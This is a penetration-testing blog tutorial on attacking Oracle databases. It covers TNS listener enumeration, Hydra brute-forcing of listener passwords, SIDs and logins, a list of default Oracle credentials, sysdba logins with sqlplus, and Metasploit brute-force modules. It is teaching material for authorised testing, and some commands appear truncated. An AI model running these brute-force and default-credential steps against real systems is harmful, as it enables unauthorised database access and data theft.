Pentesters Guide to Oracle Hacking

Netscylla Cyber Security
6 min readJun 12, 2018


Example of logging into Oracle Successfully!

A colleague encountered Oracle for the first time this week! Yes, you guessed it, they popped their Oracle DB Cherry! So attached is a sample of notes we shared with them; as usual we thought we would share them with everyone in the interests of being open and to help others learn the basics of connecting to an Oracle database.

What is Oracle?

Oracle is a RDBMS database that is produced and marketed by Oracle — wikipedia

RDBMS — A relational multi-model database.

The initial release was Oracle v2 back in 1979, these days Oracle is sporting version 12c (March 2017). But due to expensive licensing you may still see versions 10g and 11g kicking around in your datacenters, or backend database tiers.

So how do we go about penetration testing Oracle databases? The first step is always enumeration followed by more enumeration — just like any other day!

Oracle at a network level

By default the Oracle database listens on TCP port 1521.

You may also get secondary listeners on 1522–1529 (or totally custom ports depending on the administrator).

When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP). For this we have a simple tool called tnscmd/tnscmd10g

$ ./ status -h
sending (CONNECT_DATA=(COMMAND=status)) to
writing 89 bytes
. .......6.........E. ...........O........(DESCRIPTION=(TMP=)(VSNNUM=153093376)(ERR=0)(ALIAS=LISTENER)(SECURITY=OFF)
(VERSION=TNSLSNR for 32-bit Windows: Version - Production)(START_DATE=30-MAY-2007 02:00:25)

In the above example we have discovered an Oracle 10g database thats willing to talk to us; If however, you recieve an error, the listener may be password protected — dont worry…. hydra to the rescue.

Hydra & Oracle Listener

Use the following command syntax to brute-force a listener password

./hydra -P <Password File> -t <no of threads> -s 1521 (target default port) <target> oracle-listener


./hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener

Once we have access to the listener the next step is to enumerate the SID!

Enumerating the SID

What is a SID

The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.

So how do we enumerate SIDs, first there is a brilliant tool from called OScanner, but we can also use Hydra and Metasploit.


Oscanner is a brilliant security tool from cqure (some reason I cant find the a link that works) but it is available in Kali Linux —

$ sudo oscanner -s   -P 8888
[sudo] password for cyborg:
Oracle Scanner 1.0.6 by
[-] Checking host
[x] Failed to enumerate sids from host
[-] Loading services/sids from service file
[+] Checking sid (ORCL) for common passwords

Hydra & Oracle SIDs

Use the following command syntax to brute-force SIDs

./hydra -L <File of SIDs> -s 1521 (target default port) <target> oracle-sid


./hydra -L /usr/share/oscanner/lib/services.txt -s 1521 host.victim oracle-sid

Once we have found a valid SID, the next step is account enumeration!

Oracle Targeting Accounts

This is where we target the databases user accounts. If we’re just after data, any account could be useful, but if we want to escalate privileges we need either a DBA account or the SYS account to capture either sensitive information; such as password hashes, or execute code, that could possibly facilitate remote code execution on the local Operating System.

Default Passwords

Below are some of the default passwords associated with Oracle:

  • DBSNMP/DBSNMP — Intelligent Agent uses this to talk to the db server (its some work to change it)
  • SYS/CHANGE_ON_INSTALL — Default sysdba account before and including Oracle v9, as of version 10g this has to be different!
  • PCMS_SYS/PCMS_SYS — Default x account
  • WMSYS/WMSYS — Default x account
  • OUTLN/OUTLN — Default x account
  • SCOTT/TIGER — Default x account

Other default passwords can be found here and here.

Or we can use automated tools to help us out:


$ sudo oscanner -s   -P 8888
[sudo] password for cyborg:
Oracle Scanner 1.0.6 by
[-] Checking host
[x] Failed to enumerate sids from host
[-] Loading services/sids from service file
[+] Checking sid (ORCL) for common passwords
[-] Account DBSNMP/DBSNMP found
[-] Account CTXSYS/CTXSYS found
[-] Account SYSTEM/MANAGER found

Hydra & Oracle SQL-Login

./hydra -L <File of usernames> -P <File of Passwords> -s 1521 (target default port) <target> /<database name/SID>


./hydra -L /tmp/user.txt -P /tmp/pass.txt -s 1521 host.victim oracle /PLSEXTPROC

Assuming that on each stage we are successful, we should have a Listener, SID and valid account. Next we log into the database….

Installing and Using SQLPLUS

We will quickly walk through the installation of Oracle and sqlplus on Debian/Ubuntu based systems:

The Install

As root, create the directory /opt/oracle. Then download the Oracle Instant Client packages for your version of Kali Linux. The packages you will need are:


Unzip these under /opt/oracle, and you should now have a path called /opt/oracle/instantclient_12_1/. Next symlink the shared library that we need to access the library from oracle:

# ln
# ls -lh
lrwxrwxrwx 1 root root 17 Jun 1 15:41 ->
# ldconfig

You also need to configure the appropriate environment variables, add the following to either

  • ~/.bashrc
  • /etc/profile
export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1

Add Oracle libraries to ldconfig:

echo "/opt/oracle/instantclient_12_1/" >> /etc/

If you have succeeded, you should be able to run sqlplus from a command prompt (you may need to log out and log back in again):

# sqlplusSQL*Plus: Release Production on Mon Jun 1 17:22:53 2015Copyright (c) 1982, 2014, Oracle.  All rights reserved.Enter user-name:

Logging into a Remote Database

The simplest command is:

sqlplus <username>/<password>@<ip_address>/<SID>;

If the TNS Listener is on a non-default port (e.g. TCP/1522) :

sqlplus <username>/<password>@<ip_address>:<port>/<SID>;

If an account has system database priviledges (sysdba) or system operator (sysop) you may wish to try the following:

sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba';

Example — logging in as a dba on a default listener

sqplus SYSTEM/MANAGER@ 'as sysdba'

Metasploit Framework & Oracle

Next week, we’ll discuss setting up Metasploit and replaying these attacks:

Setting up MSF for Oracle Pwnage

Step One — Install SQLPLUS

Simply follow the instructions above

Step Two — Install Ruby Gem ruby-oci8

# wget
# unzip
# cd ruby-oci8-ruby-oci8-2.1.8/

Install other OS dependancies:

apt-get install libgmp-dev

Compile and install ruby-oci8

# make
# make install
# gem install ruby-oci8

Step Three — Test the install

# msfconsolemsf> use auxiliary/admin/oracle/tnscmdmsf auxiliary(sql) > Set RHOST
msf auxiliary(sql) > run

[*] Sending SQL...
[*] Oracle10g Enterprise Edition Release - Production
[*] PL/SQL Release - Production
[*] CORE Production
[*] TNS for Solaris: Version - Production
[*] NLSRTL Version - Production
[*] Done...
[*] Auxiliary module execution completed


The example is abbreviated and assumes you can work Metasploit console:

use auxiliary/admin/oracle/sid_brute
msf > run
[*] - Checking 1 SID false against
[*] - Oracle - Checking 'ORCL'
[*] - Oracle - 'ORCL' is valid
[*] - 1 of 1 hosts (100%)...

MSF & Accounts

Another simple example:

use auxiliary/admin/oracle/oracle_login
msf > run
[*] Starting brute force on
[*] Auxiliary mode execution completed

The End

This concludes our mini Oracle walk through for this week; Hopefully, you have all learnt something new. If you want to practise attacking Oracle databases, the safest way is to register for the Oracle Developer Days Virtualbox VM:

Hopefully next week (or in the near future) we will have the time to cover more attacks against the Oracle database. So stay tuned!


Netscylla or its staff cannot be held responsible for any abuse relating from this blog post. This post is to raise awareness in the possible design and implementation flaws from system and database administrators that may or may not include security weaknesses, which may compromise your enterprise database. REMEMBER: It is illegal to attempt unauthorised access on any system you do not personally own, unless you have explicit permission in writing from the system owner!



Netscylla Cyber Security

Interesting thoughts and opinions from the field of cyber security in general, focusing mainly on penetration testing and red-teaming.